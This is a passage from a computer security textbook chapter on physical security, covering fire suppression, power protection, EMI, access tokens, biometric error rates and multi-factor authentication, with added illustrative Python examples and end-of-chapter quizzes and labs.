According to the Fire Suppression Systems Association (www.fssa.net), 43 percent of businesses that close as a result of a significant fire never reopen. An additional 29 percent fail within three years of the event. The ability to respond to a fire quickly and effectively is thus critical to the long-term success of any organization. Addressing potential fire hazards and vulnerabilities has long been a concern of organizations in their risk analysis process. The goal obviously should be never to have a fire, but in the event that one does occur, it is important that mechanisms are in place to limit the damage the fire can cause.
Tech Tip
Environment and Fires
While it may at first seem to the security professional that environmental controls and natural disasters such as fires don't have anything to do with computer security, think of it in terms of availability. If the goal of the attacker is not information but rather to deny an organization the use of its resources, environmental factors, and disasters such as fires, can be used to deny the target the use of its own computing resources. This, then, becomes a security issue as well as an operational issue.
Water-Based Fire Suppression Systems
Water-based fire suppression systems have long been, and still are today, the primary tool to address and control structural fires. Considering the amount of electrical equipment found in today's office environment and the fact that, for obvious reasons, this equipment does not react well to large applications of water, it is important to know what to do with equipment if it does become subjected to a water-based sprinkler system. The National Fire Protection Association's 2013 NFPA 75: Standard for the Protection of Information Technology Equipment outlines measures that can be taken to minimize the damage to electronic equipment exposed to water. This guidance includes these suggestions:
Open cabinet doors, remove side panels and covers, and pull out chassis drawers to allow water to run out of equipment.
Set up fans to move room-temperature air through the equipment for general drying. Move portable equipment to dry, air-conditioned areas.
Use compressed air at no higher than 50 psi to blow out trapped water.
Use handheld dryers on the lowest setting to dry connectors, backplane wire wraps, and printed circuit cards.
Use cotton-tipped swabs for hard-to-reach places. Lightly dab the surfaces to remove residual moisture.
Keep the dryers well away from components and wires. Overheating of electrical components can cause permanent damage.
Even if these guidelines are followed, damage to the systems may have already occurred. Since water is so destructive to electronic equipment, not only because of the immediate problem of electrical shorts but also because of the longer-term corrosive damage water can cause, alternative fire suppression methods have been sought.
Halon-Based Fire Suppression Systems
A fire needs fuel, oxygen, and high temperatures for the chemical combustion to occur. If you remove any of these, the fire will not continue. Halon interferes with the chemical combustion present in a fire. Even though halon production was banned in 1994, a number of these systems still exist today. They were originally popular because halon will mix quickly with the air in a room and will not cause harm to computer systems. Halon is, however, dangerous to humans, especially when subjected to extremely hot temperatures (such as might be found during a fire), when it can degrade into other toxic chemicals. As a result of these dangers, and also because halon has been linked with the issue of ozone depletion, halon is banned in new fire suppression systems. It is important to note that under the Environmental Protection Agency (EPA) rules that mandated no further production of halon, existing systems were not required to be destroyed. Replacing the halon in a discharged system, however, will be a problem, since only existing stockpiles of halon may be used and the cost is becoming prohibitive. For this reason, many organizations are switching to alternative solutions.
Tech Tip
Drills
In the event of an emergency, people will be challenged to perform correct actions when stressed by the emergency. The use of drills, plans, and testing will ensure that escape plans and escape routes are known and effective and that people are familiar with their use. The time to practice is before the problem, and repeating practice over time builds confidence and strengthens familiarity.
Clean-Agent Fire Suppression Systems
These alternatives are known as clean-agent fire suppression systems, since they not only provide fire suppression capabilities but also protect the contents of the room, including people, documents, and electronic equipment. Examples of clean agents include carbon dioxide, argon, Inergen, and FM-200 (heptafluoropropane). Carbon dioxide (CO2) has been used as a fire suppression agent for a long time. The Bell Telephone Company used portable CO2 extinguishers in the early part of the 20th century. Carbon dioxide extinguishers attack all three necessary elements for a fire to occur. CO2 displaces oxygen so that the amount of oxygen remaining is insufficient to sustain the fire. It also provides some cooling in the fire zone and reduces the concentration of "gasified" fuel. Note, though, that a CO2 total-flooding system, unlike the inert-gas blends that follow, reaches concentrations that are lethal to people, so it requires pre-discharge alarms and evacuation rather than being safe for occupied rooms. Argon extinguishes fire by lowering the oxygen concentration below the 15 percent level required for combustible items to burn. Argon systems are designed to reduce the oxygen content to about 12.5 percent, which is below the 15 percent needed for the fire but is still above the 10 percent required by the EPA for human safety. Inergen, a product of Ansul Corporation, is composed of three gases: 52 percent nitrogen, 40 percent argon, and 8 percent carbon dioxide. In a manner similar to pure argon systems, Inergen systems reduce the level of oxygen to about 12.5 percent, which is sufficient for human safety but not sufficient to sustain a fire. Another chemical used in the phase-out of halon is FE-13, or trifluoromethane. This chemical was originally developed as a refrigerant and works to suppress fires by inhibiting the combustion chain reaction. FE-13 is gaseous, leaves behind no residue that would harm equipment, and is considered safe to use in occupied areas. Other halocarbons are also approved for use in replacing halon systems, including FM-200 (heptafluoropropane), a chemical also used as a propellant in asthma medication dispensers.
Handheld Fire Extinguishers
Automatic fire suppression systems designed to discharge when a fire is detected are not the only systems you should be aware of. If a fire can be caught and contained before the automatic systems discharge, it can mean significant savings to the organization in terms of both time and equipment costs (including the recharging of the automatic system). Handheld extinguishers are common in offices, but the correct use of them must be understood or disaster can occur. There are four different types of fire, as shown in Table 8.1. Each type of fire has its own fuel source and method for extinguishing it. Type A systems, for example, are designed to extinguish fires with normal combustible material as the fire's source. Water can be used in an extinguisher of this sort, since it is effective against fires of this type. Water, as we've discussed, is not appropriate for fires involving wiring or electrical equipment. Using a type A extinguisher against an electrical fire will not only be ineffective but can result in additional damage. Some extinguishers are designed to be effective against more than one type of fire, such as the common ABC fire extinguishers. This is probably the best type of system to have in a data processing facility. All fire extinguishers should be easily accessible and should be clearly marked. Before anybody uses an extinguisher, they should know what type of extinguisher it is and what the source of the fire is. When in doubt, evacuate and let the fire department handle the situation.
Table 8.1 Types of Fire and Suppression Methods
Exam Tip: The type of fire determines the type of extinguisher that should be used to suppress it. Remember that the most common type is the ABC fire extinguisher, which is designed to handle all types of fires except flammable-metal fires, which are rare.
Try This!
Handheld Fire Extinguishers
Computer security professionals typically do not have much influence over the type of fire suppression system that their office includes. It is, however, important that they are aware of what type has been installed, what they should do in case of an emergency, and what needs to be done to recover after the release of the system. One area that they can influence, however, is the type of handheld fire extinguisher that is located in their area. Check your facility to see what type of fire suppression system is installed. Also check to see where the fire extinguishers are in your office and what type of fires they are designed to handle.
Fire Detection Devices
An essential complement to fire suppression systems and devices are fire detection devices (fire detectors). Detectors may be able to detect a fire in its very early stages, before a fire suppression system is activated, and sound a warning that potentially enables employees to address the fire before it becomes serious enough for the fire suppression equipment to kick in. There are several different types of fire detectors. One type, of which there are two varieties, is activated by smoke. The two varieties of smoke detector are ionization and photoelectric. A photoelectric detector is good for potentially providing advance warning of a smoldering fire. This type of device monitors an internal beam of light. If something degrades the light, for example by obstructing it, the detector assumes it is something like smoke and the alarm sounds. An ionization style of detector uses an ionization chamber and a small radioactive source to detect fast-burning fires. Shown in Figure 8.10, the chamber consists of two plates, one with a positive charge and one with a negative charge. Radiation from the source ionizes the oxygen and nitrogen molecules in the air, knocking an electron free from each molecule. The freed electron, which has a negative charge, is attracted to the positive plate, and the remainder of the molecule, now a positively charged ion, is attracted to the negative plate. This movement of charged particles creates a very small electric current that the device measures. Smoke particles entering the chamber attach to the ions and reduce this current, and the detector sounds an alarm when it senses the drop. Both of these devices are often referred to generically as smoke detectors, and combinations of both varieties are possible. For more information on smoke detectors, see http://home.howstuffworks.com/home-improvement/household-safety/fire/smoke2.htm.
Figure 8.10 An ionization chamber for an ionization type of smoke detector
Tech Tip
Testing Controls
Because of the importance of their protection, safety controls should be periodically tested for proper operation and alerting. This should be a system-level, not device-level, test to ensure the entire control system performs in the intended manner.
Another type of fire detector is activated by heat. These devices also come in two varieties. Fixed-temperature or fixed-point devices activate if the temperature in the area ever exceeds some predefined level. Rate-of-rise or rate-of-increase temperature devices activate when there is a sudden increase in local temperature that may indicate the beginning stages of a fire. Rate-of-rise sensors can provide an earlier warning but are also responsible for more false warnings. A third type of detector is flame activated. This type of device relies on the flames from the fire to provide a change in the infrared energy that can be detected. Flame-activated devices are generally more expensive than the other two types but can frequently detect a fire sooner.
Power Protection
Computer systems require clean electrical power, and for critical systems, uninterrupted power can be important as well. There are several elements used to manage the power to systems, including uninterruptible power supplies and backup power systems.
Tech Tip
UPS Attributes
UPS systems have several attributes to consider:
The electrical load they can support (measured in kVA)
The length of time they can support the load
The speed of providing power when there is a power failure
The physical space they occupy
UPS
An uninterruptible power supply (UPS) is used to protect against short-duration power failures. There are two types of UPS, online and standby. An online UPS is in continuous use because the primary power source goes through it to the equipment. It uses AC line voltage to charge a bank of batteries. When the primary power source fails, an inverter in the UPS will change the DC of the batteries into AC. A standby UPS has sensors to detect power failures. If there is a power failure, the load will be switched to the UPS. It stays inactive before a power failure, and takes more time than an online UPS to provide power when the primary source fails: the transfer takes a few milliseconds, which most equipment power supplies ride through, whereas an online UPS has no transfer gap at all.
Backup Power and Cable Shielding
Backup power sources, such as a motor generator, another electrical substation, and so on, are used to protect against a long-duration power failure. A voltage regulator and line conditioner are used to protect against an unstable power supply and spikes. Proper grounding is essential for all electrical devices to protect against short circuits and static electricity. In more sensitive areas, cable shielding can be employed to avoid interference. Power line monitoring can be used to detect changes in frequency and voltage amplitude, warning of brownouts or spikes. An emergency power off (EPO) switch can be installed to allow for the quick shutdown of power when required. To prevent electromagnetic interference and voltage spikes, electrical cables should be placed away from powerful electrical motors and lighting. Another source of power-induced interference can be fluorescent lighting, which can cause radio frequency interference.
Electromagnetic Interference
Electromagnetic interference, or EMI, can plague any type of electronics, but the density of circuitry in the typical data center can make it a haven for EMI. EMI is defined as the disturbance on an electrical circuit caused by that circuit's reception of electromagnetic radiation. Magnetic radiation enters the circuit by induction, where magnetic waves create a charge on the circuit. The amount of sensitivity to this magnetic field depends on a number of factors, including the length of the circuit, which can act like an antenna. EMI is grouped into two general types: narrowband and broadband. Narrowband EMI is, by its nature, electromagnetic energy with a small frequency band and, therefore, typically sourced from a device that is purposefully transmitting in the specified band. Broadband EMI covers a wider array of frequencies and is typically caused by some type of general electrical power use such as power lines or electric motors. In the United States, the Federal Communications Commission has responsibility for regulating products that produce EMI and has developed a program for equipment manufacturers to adhere to standards for EMI immunity. Modern circuitry is designed to resist EMI. Cabling is a good example; the twist in unshielded twisted pair, or Category 6/6a, cable is there to reduce EMI. EMI is also controlled by metal computer cases that are grounded; by providing an easy path to ground, the case acts as an EMI shield. A bigger example would be a Faraday cage or Faraday shield, which is an enclosure of conductive material that is grounded. These can be room sized or built into a building's construction; the critical element is that there is no significant gap in the enclosure material. These measures can help shield EMI, especially in high radio frequency environments.
While we have talked about the shielding necessary to keep EMI radiation out of your circuitry, there is also technology to try and help keep it in. Known by some as TEMPEST, it is also known as Van Eck emissions. A computer's monitor or LCD display produces electromagnetic radiation that can be remotely observed with the correct equipment. TEMPEST was the code word for an NSA program to secure equipment from this type of eavesdropping. While some of the information about TEMPEST is still classified, there are guides on the Internet that describe protective measures, such as shielding and electromagnetic-resistant enclosures. A company has even developed a commercial paint that offers radio frequency shielding.
Tech Tip
Master Keys
Mechanical keying systems with industrial-grade locks have provisions for multiple master keys. This allows individual master keys to be designated by floor, by department, by the whole building, and so forth. This provides tremendous flexibility, although if a master key is lost, significant rekeying will be required.
Electronic Access Control Systems
Access tokens are defined as "something you have." An access token is a physical object that identifies specific access rights. Access tokens are frequently used for physical access solutions, just as your house key is a basic physical access token that allows you access into your home. Although keys have been used to unlock devices for centuries, they do have several limitations. Keys are paired exclusively with a lock or a set of locks, and they are not easily changed. It is easy to add an authorized user by giving the user a copy of the key, but it is far more difficult to give that user selective access unless that specified area is already set up as a separate key. It is also difficult to take access away from a single key or key holder, which usually requires a rekey of the whole system. In many businesses, physical access authentication has moved to contactless radio frequency cards and proximity readers. When passed near a card reader, the card sends out a code using radio waves. The reader picks up this code and transmits it to the control panel. The control panel checks the code against the reader from which it is being read and the type of access the card has in its database. One of the advantages of this kind of token-based system is that any card can be deleted from the system without affecting any other card or the rest of the system. The RFID-based contactless entry card shown in Figure 8.11 is a common form of this token device employed for door controls and is frequently put behind an employee badge. In addition, all doors connected to the system can be segmented in any form or fashion to create multiple access areas, with different permissions for each one. The tokens themselves can also be grouped in multiple ways to provide different access levels to different groups of people. All of the access levels or segmentation of doors can be modified quickly and easily if building space is retasked. Newer technologies are adding capabilities to the standard token-based systems.
Figure 8.11 Smart cards have an internal chip as well as multiple external contacts for interfacing with a smart card reader.
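The control-panel logic described above, written out as an added example that is not from the textbook and not any vendor's firmware: readers are bound to areas, areas to access levels, and cards to a holder and a level. A badge read is decided by looking up the reader's area and the card's level; a lost card is dropped from the card table on its own, and retasking a door is a change to the area table rather than a rekey. Card codes, reader names, and area names are invented.

```python
"""Control-panel decision logic for a contactless-card door system.

Added example, not from the textbook and not a vendor's firmware.
Card codes, reader names and area names below are invented.
"""
from dataclasses import dataclass, field


@dataclass
class AccessPanel:
    readers: dict = field(default_factory=dict)      # reader_id -> area it guards
    area_levels: dict = field(default_factory=dict)  # area -> {access levels allowed}
    cards: dict = field(default_factory=dict)        # card_code -> (holder, level)
    log: list = field(default_factory=list)          # (reader, area, code, holder, decision)

    def add_reader(self, reader_id, area):
        self.readers[reader_id] = area

    def grant(self, area, level):
        """Let every card holding `level` through doors onto `area`."""
        self.area_levels.setdefault(area, set()).add(level)

    def issue_card(self, code, holder, level):
        self.cards[code] = (holder, level)

    def revoke_card(self, code):
        """Drop one lost or stolen card; no other card or door is touched."""
        self.cards.pop(code, None)

    def check(self, code, reader_id):
        """Decide a badge read; True releases the door strike.
        Unknown readers and unknown (or revoked) cards fail closed."""
        area = self.readers.get(reader_id)
        holder, decision = None, False
        if area is not None and code in self.cards:
            holder, level = self.cards[code]
            decision = level in self.area_levels.get(area, set())
        self.log.append((reader_id, area, code, holder, decision))
        return decision

    def denied_reads(self):
        """Denied reads are what a guard or a SIEM should look at first."""
        return [entry for entry in self.log if not entry[-1]]


def build_demo_panel():
    """Constructed site: a lobby door everyone may use and a server-room
    door restricted to the it_ops level."""
    panel = AccessPanel()
    panel.add_reader("lobby-door", "lobby")
    panel.add_reader("server-room-door", "server_room")
    panel.grant("lobby", "staff")
    panel.grant("lobby", "it_ops")
    panel.grant("server_room", "it_ops")
    panel.issue_card(0x1A2B, "alice", "staff")
    panel.issue_card(0x3C4D, "bob", "it_ops")
    return panel


if __name__ == "__main__":
    panel = build_demo_panel()
    print(panel.check(0x1A2B, "server-room-door"))  # False: staff level not granted there
    panel.revoke_card(0x1A2B)                        # lost card: only this entry goes
    print(panel.check(0x1A2B, "lobby-door"))         # False
    print(panel.denied_reads())
```

The panel keys its decision on the reader as much as on the card, which is what lets one card carry different rights at different doors; a real panel adds time windows and anti-passback, but the table shape is the same.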
The advent of smart cards (cards that contain integrated circuits capable of generating and storing cryptographic keys) has enabled cryptographic types of authentication. Smart card technology has proven reliable enough that it is now part of a governmental standard for physical and logical authentication. Known as Personal Identity Verification, or PIV, cards, they adhere to the FIPS 201 standard. This smart card includes a cryptographic chip and connector, as well as a contactless proximity card circuit. It also has standards for a printed photo and name printing on the front. Biometric data can be stored on the card, providing an additional authentication factor, and if the PIV standard is followed, several forms of identification are needed to get a card.
Tech Tip
Personnel ID Badges
Having personnel wear a visible ID badge with their picture is a common form of physical security. If everyone is supposed to wear a badge visibly, then anyone who sees someone without a badge can ask them who they are, and why they are there. This greatly increases the number of eyes watching for intruders in large, publicly accessible facilities.
The primary drawback of token-based authentication is that only the token is being authenticated. Therefore, the theft of the token could grant anyone who possessed the token access to what the system protects. The risk of theft of the token can be offset by the use of multiple-factor authentication. One of the ways that people have tried to achieve multiple-factor authentication is to add a biometric factor to the system.
Access Tokens
Electronic access control systems were spawned from the need to have more logging and control than provided by the older method of metallic keys. Most electronic systems currently use a token-based card that, if passed near a reader, will unlock the door strike and let you pass into the area (assuming you have permission from the system). Newer technology attempts to make the authentication process easier and more secure. The following sections discuss how tokens and biometrics are being used for authentication. They also look into how multiple-factor authentication can be used for physical access.
Biometrics
Biometrics use the measurements of certain biological factors to identify one specific person from others. These factors are based on parts of the human body that are unique. The most well known of these unique biological factors is the fingerprint. Fingerprint readers have been available for several years in laptops. These come in a variety of form factors, such as the example shown in Figure 8.12, and as standalone USB devices.
Figure 8.12 Newer laptop computers often include a fingerprint reader.
However, many other biological factors can be used, such as the retina or iris of the eye, the geometry of the hand, and the geometry of the face. When these are used for authentication, there is a two-part process: enrollment and then authentication. During enrollment, a computer takes the image of the biological factor and reduces it to a numeric value. When the user attempts to authenticate, their feature is scanned by the reader, and the computer compares the numeric value being read to the one stored in the database. If they match, access is allowed. Since these physical factors are unique, theoretically only the actual authorized person would be allowed access. In the real world, however, the theory behind biometrics breaks down.
Tokens that have a digital code work very well because everything remains in the digital realm. A computer checks your code, such as 123, against the database; if the computer finds 123 and that number has access, the computer opens the door. Biometrics, however, take an analog signal, such as a fingerprint or a face, and attempt to digitize it, and it is then matched against the digits in the database. The problem with an analog signal is that it might not encode the exact same way twice. For example, if you came to work with a bandage on your chin, would the face-based biometrics grant you access or deny it? Engineers who designed these systems understood that if a system was set to exact checking, an encoded biometric might never grant access since it might never scan the biometric exactly the same way twice. Therefore, most systems have tried to allow a certain amount of error in the scan, while not allowing too much. This leads to the concepts of false positives and false negatives. A false positive occurs when a biometric is scanned and allows access to someone who is not authorized; for example, two people who have very similar fingerprints might be recognized as the same person by the computer, which grants access to the wrong person. A false negative occurs when the system denies access to someone who is actually authorized; for example, a user at the hand geometry scanner forgot to wear a ring he usually wears, and the computer doesn't recognize his hand and denies him access. For biometric authentication to work properly, and also be trusted, it must minimize the existence of both false positives and false negatives. To do that, a balance between exactness and error must be created so that the machines allow a little physical variance, but not too much.
False Positives and False Negatives
When a decision is made on information and an associated range of probabilities, the conditions exist for a false decision. Figure 8.13 illustrates two overlapping probabilities; an item belongs to either the red curve or the blue curve, but not both. The problem in deciding which curve an item belongs to occurs when the curves overlap.
Figure 8.13 Overlapping probabilities
When there is an overlapping area, it is typically referred to as the false positive and false negative rate. Note that in the accompanying figures, the size of overlap is greatly exaggerated to make it easy to see. Figure 8.14 illustrates a false positive detection. If the value observed is the dotted line, then it could be considered either a match or a non-match. If in fact it should not match, and the system tags it as a match, it is a false positive. In biometrics, a false positive would allow access to an unauthorized party.
Figure 8.14 False positive
Figure 8.15 illustrates a false negative detection. If the value observed is the dotted line, then it could be considered either a match or a non-match. If in fact it should match, and the system tags it as a non-match, it is a false negative. A false negative would prevent an authorized user from obtaining access.
Figure 8.15 False negative
Exam Tip: False positive and false negative are frequently confused. The true definitions revolve around the statistical term null hypothesis. For authentication, it is assumed that the person is not authorized. If the person is not authorized, and the test incorrectly rejects the null hypothesis and allows entry, this is a false positive, also called a Type I error. If the person is authorized, and the test fails to allow entry, then this is a false negative, or Type II error. The important element is the direction of the null hypothesis, which, for authentication, would be to deny entry.
To solve the false positive and false negative issue, the probabilistic engine must produce two sets of curves that do not overlap. This is equivalent to very low, <0.001%, false positive and false negative rates. Because the curves technically have tails that go on forever, there will always be some false rates, but the numbers have to be exceedingly small to assure security. Figure 8.16 illustrates the desired, but typically impractical, separation of the curves.
Figure 8.16 Desired situation
A more realistic situation has the two curves crossing over at some point, and this point is known as the crossover error rate (CER). The CER is the point where the false acceptance and false rejection rates are equal. While a system has the ability to adjust which of the two false rates to favor, the CER provides a means of comparing systems' performance at discriminating signals. A system with a CER of 2 percent is more accurate (and has more separation) than one with a CER of 5 percent. Another concern with biometrics is that if someone is able to steal the uniqueness factor that the machine scans (your fingerprint from a glass, for example) and is able to reproduce that factor in a substance that fools the scanner, that person now has your access privileges. This idea is compounded by the fact that it is impossible for you to change your fingerprint if it gets stolen. It is easy to replace a lost or stolen token and delete the missing one from the system, but it is far more difficult to replace a human hand. Another problem with biometrics is that parts of the human body can change. A human face can change, through scarring, weight loss or gain, or surgery. A fingerprint can be changed through damage to the fingers. Eye retinas can be affected by some types of diabetes or by pregnancy. All of these changes force the biometric system to allow a higher tolerance for variance in the biometric being read. This has led the way for high-security installations to move toward multiple-factor authentication.
Multiple-Factor Authentication
Multiple-factor authentication is simply the combination of two or more types of authentication. Three broad categories of authentication can be used: what you are (for example, biometrics), what you have (for instance, tokens), and what you know (passwords and other information). Two-factor authentication combines any two of these before granting access. An example would be a card reader that then turns on a fingerprint scanner; if your fingerprint matches the one on file for the card, you are granted access. Three-factor authentication would combine all three types, such as a smart card reader that asks for a PIN before enabling a retina scanner. If all three correspond to a valid user in the computer database, access is granted.
Exam Tip: Two-factor authentication combines any two methods of authentication, matching items such as a token with a biometric. Three-factor authentication combines any three, such as a passcode, biometric, and a token.
Multiple-factor authentication methods greatly enhance security by making it very difficult for an attacker to obtain all the correct materials for authentication. They also protect against the risk of stolen tokens, as the attacker must have the correct biometric, password, or both. More important, multiple-factor authentication enhances the security of biometric systems, by protecting against a stolen biometric. Changing the token makes the biometric useless unless the attacker can steal the new token. It also reduces false positives by trying to match the supplied biometric with the one that is associated with the supplied token. This prevents the computer from seeking a match using the entire database of biometrics. Using multiple factors is one of the best ways to ensure proper authentication and access control.
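The error-rate arithmetic from the false positive/false negative discussion and the one-to-one versus whole-database point just made, as an added example that is not from the textbook: constructed match scores for two hypothetical systems, functions for the false acceptance and false rejection rates at a threshold, a sweep that finds each system's crossover error rate, and the formula showing how a per-comparison false-accept probability compounds when a biometric is searched against every enrolled template instead of only the one the token names. The score lists, the 0 to 100 scale, and the five-template database are all invented for the example.

```python
"""False acceptance / false rejection rates, the crossover error rate, and
1:1 verification (token names the template) versus 1:N identification
(search the whole database).

Added example, not from the textbook. Scores are constructed: each list is
ten comparison scores on a 0-100 scale (higher = more similar). Genuine
scores come from the enrolled person, impostor scores from someone else.
A comparison is accepted when the score is at or above the threshold.
"""

GENUINE_A = [96, 91, 88, 84, 80, 77, 73, 69, 64, 58]
IMPOSTOR_A = [72, 66, 61, 57, 52, 49, 45, 41, 36, 30]

GENUINE_B = [97, 94, 90, 87, 85, 82, 79, 75, 71, 65]   # better separation
IMPOSTOR_B = [68, 60, 55, 50, 47, 43, 40, 36, 31, 27]


def far(threshold, impostor_scores):
    """False acceptance rate: fraction of impostor comparisons accepted
    (the false positive, Type I error, in the text)."""
    return sum(s >= threshold for s in impostor_scores) / len(impostor_scores)


def frr(threshold, genuine_scores):
    """False rejection rate: fraction of genuine comparisons rejected
    (the false negative, Type II error)."""
    return sum(s < threshold for s in genuine_scores) / len(genuine_scores)


def crossover_error_rate(genuine_scores, impostor_scores):
    """Try every observed score as the threshold and return (threshold, rate)
    at the point where FAR and FRR are closest to equal; `rate` is their
    mean there, which is the CER used to compare systems."""
    best = None
    for t in sorted(set(genuine_scores) | set(impostor_scores)):
        a, r = far(t, impostor_scores), frr(t, genuine_scores)
        gap = abs(a - r)
        if best is None or gap < best[0]:
            best = (gap, t, (a + r) / 2)
    _, threshold, rate = best
    return threshold, rate


def system_far(per_comparison_far, enrolled_templates):
    """Probability that a 1:N search falsely accepts an impostor against at
    least one of N enrolled templates. N=1 is the single 1:1 check a token
    reduces the problem to."""
    return 1 - (1 - per_comparison_far) ** enrolled_templates


def identify(probe_scores, threshold):
    """1:N: no token, so every enrolled template is a candidate match.
    probe_scores[i] is the probe's score against template i."""
    return [i for i, s in enumerate(probe_scores) if s >= threshold]


def verify(probe_scores, token_index, threshold):
    """1:1: the token names one template; only that score is consulted."""
    return probe_scores[token_index] >= threshold


if __name__ == "__main__":
    for name, gen, imp in (("A", GENUINE_A, IMPOSTOR_A), ("B", GENUINE_B, IMPOSTOR_B)):
        t, cer = crossover_error_rate(gen, imp)
        print(f"system {name}: CER {cer:.0%} at threshold {t}")
    # Constructed probe: scores against a five-template database, where the
    # probe really belongs to template 4 and happens to resemble template 1.
    probe = [40, 67, 55, 30, 95]
    print("1:N matches:", identify(probe, 66))        # [1, 4]: one false match
    print("1:1 with own token:", verify(probe, 4, 66))  # True
    print("1:1 with stolen token 2:", verify(probe, 2, 66))  # False
    print(f"1:N FAR at 0.1% per comparison, 1000 users: {system_far(0.001, 1000):.1%}")
```

The sweep favors the operating point with the smallest FAR/FRR gap, which is what the CER figure summarizes; a deployment would then move the threshold off that point in whichever direction its risk tolerance dictates. The last line is the reason the text gives for binding the biometric to a token: a per-comparison false-accept rate that looks acceptable becomes a near-certainty once it is multiplied across a large enrolled population.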
Chapter 8 Review
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following facts about how physical security impacts network security.
Describe how physical security directly affects computer and network security
Physical access defeats all network security protections.
Boot disks allow file system access.
Drive imaging is simple to accomplish with physical access.
Access to the internal network is simple with physical access.
Theft of hardware can be an attack in and of itself.
Discuss steps that can be taken to help mitigate risks
Removal of floppy drives and other media drives when they are unnecessary can help mitigate boot disk attacks.
Removal of CD-ROM devices also makes physical access attacks more difficult.
BIOS passwords should be used to protect the boot sequence.
USB devices are a threat and thus, if possible, USB drivers should be removed.
All users need security training.
Authentication systems should use multiple factors when feasible.
Identify the different types of fires and the various fire suppression systems designed to limit the damage caused by fires
Fires can be caused by and can consume a number of different materials. It is important to recognize what type of fire is occurring, because the extinguisher to use depends on the type of fire.
The ABC fire extinguisher is the most common type and is designed to handle most types of fires. The only type of fire it is not designed to address is one with combustible metals.
Explain electronic access controls and the principles of convergence
Access controls should have layered areas and electronic access control systems.
Electronic physical security systems need to be protected from network-based attacks.
Key Terms
access tokens, autoplay, biometrics, BIOS passwords, boot disk, closed circuit television (CCTV), contactless access cards, convergence, crossover error rate (CER), drive imaging, false negative, false positive, layered access, LiveCD, mantrap, multiple-factor authentication, physical access control, policies and procedures, smart cards, Unified Extensible Firmware Interface (UEFI), USB devices
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.Adoorsystemdesignedtoonlyallowasinglepersonthroughiscalleda(n)_______________.
2._______________includeMP3playersandflashdrives.3.A(n)_______________happenswhenanunauthorizeduseris
allowedaccess.
4.Removablemediafromwhichacomputercanbebootediscalleda(n)_______________.
5._______________forcesausertoauthenticateagainwhenenteringamoresecurearea.
6.Itemscarriedbytheusertoallowthemtobeauthenticatedarecalled_______________.
7._______________isthemeasurementofuniquebiologicalproperties,likethefingerprint.
8._______________preventanattackerfrommakingthemachinebootofftheDVDdrive.
9._______________isasystemwherethecameraandmonitoraredirectlylinked.
10.Usingatoken,fingerprintreader,andPINkeypadwouldbeanexampleof_______________.
Multiple-Choice Quiz
1. What is the most common example of an access token?
A. Smart card
B. Handwriting sample
C. PDA
D. Key
2. Which one is not commonly used as a biometric?
A. Eye retina
B. Hand geometry
C. Shoulder-to-waist geometry
D. Fingerprint
3. Probably the simplest physical attack on the computer system is:
A. Accessing an Ethernet jack to attack the network
B. Using an imitation to fool a biometric authenticator
C. Installing a virus on the CCTV system
D. Outright theft of the computers
4. What is a common threat to token-based access controls?
A. The key
B. Demagnetization of the strip
C. A system crash
D. Loss or theft of the token
5. Why can USB flash drives be a threat?
A. They use too much power.
B. They can bring malicious code past other security mechanisms.
C. They can be stolen.
D. They can be encrypted.
6. Why is HVAC important to computer security?
A. Sabotage of the AC unit could take out the electrical power.
B. Sabotage of the AC unit would make the computers overheat and shut down.
C. The AC units could be connected to the network.
D. HVAC is not important to security.
7. Why should security guards get cross-training in network security?
A. They are the eyes and ears of the corporation when it comes to security.
B. They are the only people in the building at night.
C. They are more qualified to know what a security threat is.
D. They have the authority to detain violators.
8. Why is enrollment important to biometrics?
A. Fingerprints are unique.
B. It adds another layer to the layered access model.
C. If enrollment is not done carefully, false positives will increase.
D. It completely prevents false positives.
9. Why is physical security so important to good network security?
A. Because encryption is not involved
B. Because physical access defeats nearly all network security measures
C. Because an attacker can steal biometric identities
D. Authentication
10. How does multiple-factor authentication improve security?
A. By using biometrics, no other person can authenticate.
B. It restricts users to smaller spaces.
C. By using a combination of authentications, it is more difficult for someone to gain illegitimate access.
D. It denies access to an intruder multiple times.
Essay Questions
1. You have been asked to report on the feasibility of installing an IP CCTV camera system at your organization. Detail the pros and cons of an IP CCTV system and how you would implement the system.
2. Write a memo justifying layered access for devices in an organization.
3. Write a memo justifying more user education about physical security.
4. Write a sample policy regarding the use of USB devices in an organization.
Lab Projects
• Lab Project 8.1 Load a LiveCD on your machine and examine the tools it provides. You will need the following materials:
A computer with a version of Windows installed and a CD/DVD burner
An empty CD or DVD
Then do the following:
1. Download a copy of Kali Linux. A good site from which to obtain this is www.kali.org/downloads/.
2. Burn the ISO file to the CD/DVD.
3. Reboot the machine, allowing the LiveCD to start the machine in Linux.
4. Once Kali Linux is running, open a terminal window and type wireshark.
5. With Wireshark open as a sniffing program, record the traffic to and from this computer.
A. Open Capture | Options.
B. Select Start on your Ethernet interface, usually eth0.
C. Stop Capture by selecting Capture | Stop.
D. Click any packet listed to view the analysis.
6. View the other tools on the CD under KDE | Kali.
• Lab Project 8.2 Disable autoplay on your system for several types of media. You will need the following materials:
A computer with Windows
A USB flash drive that is set to be bootable
A CD/DVD with an autoplay file
Then do the following:
1. Insert the CD/DVD and verify that autoplay is on and working.
2. Follow this chapter's instructions on disabling autoplay.
3. Reinsert the CD/DVD and verify that autoplay is disabled—nothing should appear when the CD/DVD is inserted now.
4. Insert the USB flash drive and see if autoplay works for it; if it does, disable it using the same method.
Chapter 9 Network Fundamentals
The value of a communications network is proportional to the square of the number of its users.
—METCALFE'S LAW
In this chapter, you will learn how to
Identify the basic network architectures
Define the basic network protocols
Explain routing and address translation
Classify security zones
By the simplest definition in the data world, a network is a means to connect two or more computers together for the purposes of sharing information. The term "network" has different meanings depending on the context and usage. A network can be a group of friends and associates, a series of interconnected tunnels, or, from a computer-oriented perspective, a collection of interconnected devices. Network sizes and shapes vary drastically, ranging from two personal computers connected with a crossover cable or wireless router all the way up to the Internet, encircling the globe and linking together untold numbers of individual, distributed systems. Though data networks vary widely in size and scope, they are generally defined in terms of their architecture, topology, and protocols.
Network Architectures
